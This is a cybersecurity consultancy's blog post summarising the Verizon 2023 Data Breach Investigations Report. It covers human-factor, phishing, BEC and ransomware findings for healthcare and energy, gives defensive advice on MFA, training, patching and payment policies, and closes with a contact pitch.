The Verizon 2023 Data Breach Investigations Report (DBIR) is finally released and includes many helpful insights and findings that every business must comprehend to better defend against emerging threats. What findings stand out? And what actions can critical infrastructure businesses take to be prepared and reduce the impact of data breaches?
The annual Verizon Data Breach Investigations Report is among the most highly regarded reports in the cybersecurity industry. For over fifteen years, Verizon has been sharing its data-driven analysis of the top risks global organizations face. The report’s value lies in its unbiased perspective, extensive global data, and thorough examination of all types of risks, including intentional cyber threats and human and physical errors.
Without any further ado, let’s dive into the 2023 report findings.
Summary of key findings
The human element
Perhaps the most reported finding from last year’s report was that the human element was involved in 82% of security incidents and data breaches. This year, the report indicates that 74% of all breaches involve the human element, demonstrating that people play and will continue to play a vital role in an organization’s security.
Even though this percentage is down by almost ten units compared to 2022, at least two plausible reasons explain this. First, organizations have realized the importance of the human factor in reducing business risks and have begun to invest in security awareness projects to reduce human risk.
Second, threat actors have started to exploit technical vulnerabilities more actively. This year, the technical exploit vulnerability category may have been influenced by the Log4j vulnerability, which was actively exploited. Security teams identified Log4j or CVE-2021-44228 in 90% of incidents that exploited vulnerabilities. Additionally, it is noteworthy that 32% of all Log4j scanning activity occurred within 30 days of its release.
Regarding the human factor in data breaches, it’s crucial to note that nearly 10% of them are caused by human error. Surprisingly, the majority of these mistakes are made aren’t made by technical experts like IT administrators and software developers rather than regular employees. These professionals often work in complex technology environments where mental burnout is a commonly reported issue leading to more mistakes. Furthermore, when these individuals make an error, the consequences can be severe since they deal with sensitive data sets.
Phishing and Business Email Compromise
According to the report findings, the top three methods cyber threat actors use to gain access to organizations are stolen or compromised credentials, phishing, and vulnerability exploitation. Interestingly, these have remained the top methods for the past three years. However, it is worth noting that phishing appears to be less prevalent than credential compromise and account takeover.
Despite this, phishing continues to be one of the main causes of breaches. What is particularly noteworthy is that almost half of the successful phishing incidents were attributed to Business Email Compromise (BEC). Such email attacks do not contain malicious links or infected email attachments. They rather focus on financially motivated schemes that trick individuals into approving invoices, payments, or bank account information changes, with the sole aim of stealing money.
Finally, it is important to mention that external threat actors are responsible for the majority of breaches (83%), while internal threat actors play a smaller role. Furthermore, most of these threat actors are financially motivated, typically stemming from organized crime.
Healthcare
The healthcare industry is a major target for ransomware gangs, leading to severe disruptions and potential harm to patients. In addition, data breaches have increased in the past three years due to ransomware attacks. Such attacks compromise sensitive data and cause chaos as the medical staff is forced to work without their usual systems.
System intrusion, web application attacks, and miscellaneous errors represent 68% of the reported data breaches, where the data compromised were primarily personal (67%) and medical records (54%). While system intrusion and web app attacks can be attributed to external actors, insider threat is a crucial problem, accounting for 35% of data breaches.
Although malicious insiders are not among the top three, unintentional errors are still widespread and part of the broader human issue. Misdelivery, in particular, poses a significant challenge. This type of mistake occurs when data meant for a specific individual or organization is sent to someone else, thus revealing sensitive patient information to unauthorized parties.
Oil & Gas, Energy, and Water
Just like in the healthcare sector, system intrusion, web app attacks and errors are the top three patterns of data breaches, accounting for 81% of the breaches. Surprisingly, social engineering and phishing did not make the top three, not even the top five.
However, the prevalence of ransomware attacks is common with other sectors; they are responsible for approximately one-third of data breaches. This finding explains why system intrusion was the number one pattern in 2022. Considering the high success rate of ransomware and the fact that attackers often extort unencrypted data and post it on their sites, critical infrastructure businesses need to be vigilant and take necessary precautions.
Actionable tips to take back home
Considering all the above findings, businesses globally, as well as in critical infrastructure like healthcare, oil & gas, energy and water, should focus on the following four action items to minimize the potential of a data breach:
Strong authentication
Since 49% of data breaches involve stolen or compromised credentials, strong access controls based on multi-factor authentication (MFA) are the most effective measure. According to CISA, MFA can block up to 99% of identity-based attacks. Even if sophisticated phishing attacks, like MFA prompt bombing or MFA fatigue, have shown the limitations of MFA, any MFA is better than no MFA. However, critical infrastructure companies are advised to comply with the latest mandates by the US government and deploy phishing-resistant MFA like FIDO or PKI Certificate Based Authentication (CBA).
Phishing awareness training
The second most prevalent pattern is phishing which exploits human vulnerabilities. The best way to empower people is to make them aware of how to defend against these social engineering attacks. Phishing awareness training, such as phishing simulations, should promote a positive security culture. Businesses should measure the outcome of these activities and focus on click rate and report rate.
Patch management
The third way in which attackers penetrate an organization is through the exploitation of vulnerabilities. Patching known vulnerabilities must be done as soon as possible to close the door to the attackers. In the case of critical systems, if patching is not possible at the time of release, businesses should deploy other measures to contain the impact of a breach, like endpoint detection and report and incident response procedures.
Business policies for financial transactions
To combat BEC attacks, it’s necessary to take this measure. BEC fraud emails are particularly challenging to detect through automated security tools or human intervention, as they’re customized and have fewer indicators. Furthermore, cyber attackers can easily use recent AI advancements to create these personalized email attacks in any language they choose. Therefore, employees must follow all policies related to approving, invoicing, transferring money, or modifying financial accounts to prevent fraudulent activity.
ITEGRITI has deep experience across critical infrastructure cybersecurity programs, compliance, risk, and audit. Contact us today to learn how we can leverage this experience to help you accomplish your cybersecurity goals.
Contact Us: https://itegriti.com/contact/
ITEGRITI Services: https://itegriti.com